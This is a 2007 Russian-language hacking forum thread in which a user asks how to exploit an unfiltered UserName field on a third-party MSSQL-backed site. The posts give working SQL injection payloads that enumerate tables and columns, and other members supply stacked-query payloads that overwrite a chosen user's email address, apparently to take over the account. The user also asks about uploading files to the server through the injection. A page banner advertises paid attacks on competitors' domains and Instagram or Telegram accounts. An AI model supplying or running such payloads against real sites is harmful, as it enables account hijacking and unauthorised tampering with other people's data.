mssql-injection - need help...

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
mssql-injection - need help...

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

mssql-injection - need help...

15.03.2007, 14:12

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

mssql-injection - need help...

Есть сайт, на нем поле UserName не фильтруется...
запросом
1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)--
узнаю имена таблиц
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users')--
так калонки

как мне выполнить запрос:
UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'

𝕏 Twitter Reddit Telegram Копировать ссылку

15.03.2007, 14:17

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

1 or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')
скорее всего у тебя просто прав не хватит

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

15.03.2007, 14:31

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

я сразу так делал:
1' or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')--

Цитата:

Incorrect syntax near the keyword 'UPDATE'.
Incorrect syntax near ')'.

15.03.2007, 14:45

vmn

Познающий

Регистрация: 16.10.2006

Сообщений: 82

С нами: 10299266

Репутация: 33

Цитата:

Сообщение от aka PSIH

я сразу так делал:
1' or 1=(UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz')--

Обычно делают так:
1';UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'--

Апдейт в подзапросах использовать нельзя.

15.03.2007, 14:50

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

спасибо, я сам не допер...

>Апдейт в подзапросах использовать нельзя.
буду знать...

Последний раз редактировалось aka PSIH; 15.03.2007 в 14:53..

15.03.2007, 15:12

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

;UPDATE users SET email_address='qwerty@gmail.com' WHERE user_name='hzhzhz'--

15.03.2007, 15:19

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

еще вапрос, при запросе
1' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25admin%25')--

через секунд 15-20 выдает:

Цитата:

Timeout expired. The timeout period elapsed prior to completion of the operation or the server is not responding.

можно как-нить обойти?

Последний раз редактировалось aka PSIH; 15.03.2007 в 15:21..

15.03.2007, 16:18

vmn

Познающий

Регистрация: 16.10.2006

Сообщений: 82

С нами: 10299266

Репутация: 33

нету значит таблиц таких.
А вообще советую вместо or использовать and.

15.03.2007, 16:27

aka PSIH

Постоянный

Регистрация: 07.02.2006

Сообщений: 630

С нами: 10660753

Репутация: 676

Цитата:

А вообще советую вместо or использовать and

в чем разница?

как можно через mssql-injection залить файл на сервер с удаленного сайта?

#10

15.03.2007, 16:41

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

С нами: 10309346

Репутация: 4303

Цитата:

в чем разница?

а в английском языке какая разница между Or и And? такая же и тут

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection FAQ	bx_N	Forum for discussion of ANTICHAT	2	08.03.2007 18:48
mssql injection	pop_korn	Video.Antichat	0	07.02.2007 14:43

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход